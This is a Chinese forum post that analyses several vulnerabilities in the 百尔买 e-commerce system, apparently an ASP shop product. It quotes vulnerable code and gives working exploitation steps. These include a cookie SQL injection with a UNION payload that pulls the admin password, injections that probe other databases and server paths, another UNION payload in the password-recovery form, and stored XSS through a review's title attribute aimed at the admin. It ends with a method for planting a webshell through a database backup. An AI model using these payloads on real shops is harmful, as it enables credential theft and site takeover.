[原创]百尔买电子商务系统几个漏洞的分析

wyzhack

公司让到网上去找一些现成的代码。以后做网站的时候 有的话好直接抄。
这一找可就吐了血了。。
我只会找注入和跨站的漏洞。哪位牛人告诉我 还有什么比较常见的漏洞？

一、        注入。
1．        发生在更改会员密码的时候。
代码：disuser2.asp

1. sub changepass()
   
2. if strUserName="" then
   
3. response.Write "<center>请先登录</center>"
   
4. response.End
   
5. end if %>
   
6. 
   
7.                         ．．．．．．中间省略　．．．．．．．
   
8. <td width=50% height="25" align="right">用 户 名：</td>
   
9. <td width=50% height="25" bgcolor="#FFFFFF"><font color=#FF6600>
   
10.   <% = strUserName %></font></td>               
    
11. </tr>
    
12.                 ．．．．．．中间省略　．．．．．．．
    
13. <%
    
14. end sub

复制代码

上面的代码把strUserName变量输出了．我们来看看这个strUserName 是怎么得到的！
在conn.asp里．
代码如下：

1. Dim Fy_Url,Fy_a,Fy_x,Fy_Cs(),Fy_Cl,Fy_Ts,Fy_Zx
   
2. Fy_Cl = 1               
   
3. Fy_Zx = "index.Asp"        
   
4. On Error Resume Next
   
5. Fy_Url=Request.ServerVariables("QUERY_STRING")
   
6. Fy_a=split(Fy_Url,"&")
   
7. redim Fy_Cs(ubound(Fy_a))
   
8. On Error Resume Next
   
9. for Fy_x=0 to ubound(Fy_a)
   
10. Fy_Cs(Fy_x) = left(Fy_a(Fy_x),instr(Fy_a(Fy_x),"=")-1)
    
11. Next
    
12. For Fy_x=0 to ubound(Fy_Cs)
    
13. If Fy_Cs(Fy_x)<>"" Then
    
14. If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 Or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
    
15. Select Case Fy_Cl
    
16.   Case "1"
    
17. Response.Write "<Script Language=JavaScript>alert('出现错误！参数 "&Fy_Cs(Fy_x)&" 的值中包含非法字符串！\n\n  请不要在参数中出现：;,and,select,update,insert,delete,chr 等非法字符！');window.close();</Script>"
    
18.   Case "2"
    
19. Response.Write "<Script Language=JavaScript>location.href='"&Fy_Zx&"'</Script>"
    
20.   Case "3"
    
21. Response.Write "<Script Language=JavaScript>alert(‘出现错误！参数 "&Fy_Cs(Fy_x)&"的值中包含非法字符串！\n\n  请不要在参数中出现：;,and,select,update,insert,delete,chr 等非法字符！');location.href='"&Fy_Zx&"';</Script>"
    
22. End Select
    
23.                         ．．．．中间省略　．．．．．
    
24. strUserName = "非注册用户"
    
25. strTitle = "非注册用户"
    
26. if Request.Cookies("Buy2Buy")("username")<>"" then
    
27. set rsVip=server.CreateObject("adodb.recordset")
    
28. rsVip.open "select [User].GrpID,[User].UserID,[User].Score,[User].UserEmail,[User].Deposit,[User].UserName,b2b_userjb.GrpName,b2b_userjb.Stars from [User] Inner Join b2b_userjb On [User].GrpID = b2b_userjb.GrpID where username='"&request.Cookies("Buy2Buy")("username")&"' ",conn,1,1        ／／／这里直接把ＣＯＯＫＩＥ里的ＵＳＥＲＮＡＭＥ拼进了ＳＱＬ，漏洞产生了！
    
29.                         ．．．．中间省略　．．．．．
    
30. 
    
31. strUserName = rsVip("UserName")
    
32. 
    
33.                         ．．．．中间省略　．．．．．
    
34. set rsVip=nothing
    
35. End If

复制代码

漏洞基本上和那个网软购物系统一样．
代码只对ＱＵＥＲＴ＿ＳＴＲＩＮＧ里的数据进行了关键字的检查．只对ＧＥＴ提交的数据进行了检查，而且检查的还不够严格！union asc() chr() 这种都没过滤的．
利用方法：
先注册一个会员。然后转到会员中心，然后打开ＷＳＥ，然后再修改密码．截取发送的数据包．



把username=ninty改成

1. Username=a'%20union%20select%20'1','1','1','1','1',userpassword,'1','1'%20from%20admin%20where%20''='

复制代码

一个union查询．因为a是一个不存在的用户，这样就只会有union后面的那个select语句的结果出现在recoreset中．
strUserName = rsVip("UserName")
rsVip(“UserName”)取到的正好是userpassword列的值，赋给了strUserName．
然后就被disuser2.asp输出了．
改后是这样的：



用ＮＣ提交一下．




把结果输出到了11.html里．打开后就看到密码了．



2．        在添加友情连接的时候。发生在links目录下的look.asp
按理说这个页面应该是只有管理员才能看的，因为它还有添加与删除连接的功能。不过这个文件里没有任何验证权限的代码。
而且这个注入点用处不是太大。
看代码：

1. flag=Trim(Request.QueryString("flag"))
   
2.                 ．．．．中间省略．．．．．
   
3. id=Trim(Request.QueryString("id"))
   
4. set conn=server.createobject("ADODB.CONNECTION")
   
5. connstr="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & server.mappath("links.mdb")
   
6. conn.open connstr
   
7.                 ．．．中间省略．．．．
   
8. if flag="1" then
   
9. conn.execute("update myoe_links set myoe_pass='Y' where id="&id)

复制代码

很明显，id直接加到ＳＱＬ里去了．
不过因为友情连接用的是自己的一个数据库，所以这个注入点的用处并不大．
不过在知道另一个数据库的绝对路径的时候，到是可以跨到这个数据库去查询．
我在Ｄ盘放了一个数据库a.mdb
在注入点后写上查询语句：　and exists (select * from d:\a.mdb.ccc)
返回的是错误页面：



说明不存在ccc这个表，改成admin呢?
返回正常：



说明存在admin 表，和普通的注入基本上一样．
再有一个小功能就是可以探测服务器上的目录结构．不过也属于鸡肋级的．．．．
比如：



现在提示的是找不到文件，说明c：\windows目录是存在的！
换一个不存在的目录试试．



目录不存在的时候会提示　＂不是一个有效路径＂．
检测非ＭＤＢ格式的文件是否存在：



错误说不可识别的数据库，表示文件是存在的，如果不存在还是会报文件不存在的错

3．        找回密码：disuser2.asp

1. set rs=server.CreateObject("adodb.recordset")
   
2. rs.open "select UserQuestion,UserAnswer from [user] where username='"&trim(request.form("username"))&"' ",conn,1,1
   
3. if rs.eof and rs.bof then
   
4. response.write "<center>
   
5. 查无此用户，请返回！</center>"
   
6. else
   
7.                 ．．．中间省略．．．．
   
8. response.Write "<font color=red>"&trim(rs("UserQuestion"))&"</font>"
   
9. end if
   
10. rs.close
    
11. set rs=nothing

复制代码

不多解释了，在首页点＂忘密＂
然后输入a' union select userpassword,admin from admin where ''='，就看到管理员密码了．同样在更改密码的时候，username也没有过滤，也造成了可以更改任意用户的密码，不过没啥太大的有处，因为管理员表和用户表是分开的，我们不能更改管理员的密码

二、        跨站．
发生在商品评论那里．B2b_plock.asp

1. dim id,action
   
2. id=SafeRequest("id",1)
   
3. action=request.form("action")
   
4. if action="save" then
   
5. 
   
6. function HTMLEncode2(fString)
   
7.         fString = Replace(fString, CHR(13), "")
   
8.         fString = Replace(fString, CHR(10) & CHR(10), "</P><P>")
   
9.         fString = Replace(fString, CHR(10), "
   
10. ")
    
11.         HTMLEncode2 = fString
    
12. end function
    
13. 
    
14. set rs=server.CreateObject("adodb.recordset")
    
15. rs.open "select * from review",conn,1,3
    
16. rs.addnew
    
17. rs("id")=id
    
18. rs("title")=HTMLEncode2(trim(request.form("title")))
    
19. rs("reviewcontent")=HTMLEncode2(trim(request.form("reviewcontent")))
    
20. rs("reviewdtm")=now()
    
21. rs("audit")=0
    
22. rs("ipaddr") = Request.ServerVariables("REMOTE_ADDR")
    
23. rs.update
    
24. rs.close
    
25. set rs=nothing
    
26. response.write "
    
27. 
    
28. <table width=96% border=0 align=center cellpadding=0 cellspacing=0><tr><td height=86 bgcolor=#F5F5F5><div align=center>"
    
29. response.write "您的评论已成功提交!
    
30. 
    
31. <a href=javascript:window.close()>关闭窗口</a></div></td></tr></table>"
    
32. response.End
    
33. end if

复制代码

只用HTMLEncode2函数过滤了一下chr(13) 和 chr(10)　对我们并没有什么影响
再看后台　查看商品评论的代码：
B2b_glshpl.asp

1. <td height="25">
   
2. <% if len(rs("reviewcontent"))>20 then
   
3. response.write "<a href=# onClick=""javascript:window.open('b2b_cm.asp?id="&rs("reviewid")&"','','width=310,height=190,toolbar=no, status=no, menubar=no, resizable=yes, scrollbars=yes');return false;"" title="&trim(rs("reviewcontent"))&">"&left(trim(rs("reviewcontent")),18)&"...</a>"
   
4.         else
   
5. response.write "<a href=# onClick=""javascript:window.open('b2b_cm.asp?id="&rs("reviewid")&"','','width=310,height=190,toolbar=no, status=no, menubar=no, resizable=yes, scrollbars=yes');return false;"" title="&trim(rs("reviewcontent"))&">"&trim(rs("reviewcontent"))&"</a>"
   
6. end if%>            
   
7. </td>

复制代码

只是trim了一下．没有过滤．不过这里不能直接输入<script>alert(‘xxx’);</script>这样的，注意代码里，对字符串进行了截取．只输出左边的１８个字符．这样跨站代码就不能正确执行了．
不过title属性那里的输出可是没有过滤的哦！
我们就利用这一点！
在首页随便找一个商品打开后，在评论的地方输入：　"我靠，我对这个产品有很大的意见！！！"
写的长一点．让管理看不能一眼把所有内容全看到，这样他应该就会去点这条评论．
，只要鼠标移到这条评论上．跨站代码就执行了！



三、        拿ＷＥＢＳＨＥＬＬ
1.        ewebeditor 后台用的是这个编辑器，而且管理员登陆页没有删～
2.        上传文件，备份数据库
3.        在添加友情连接的时候，在邮箱处写入一句话木马，到后台备份数据库，数据库地址写../links/links.mdb，就可以了　，前提是连接的数据库路径没有改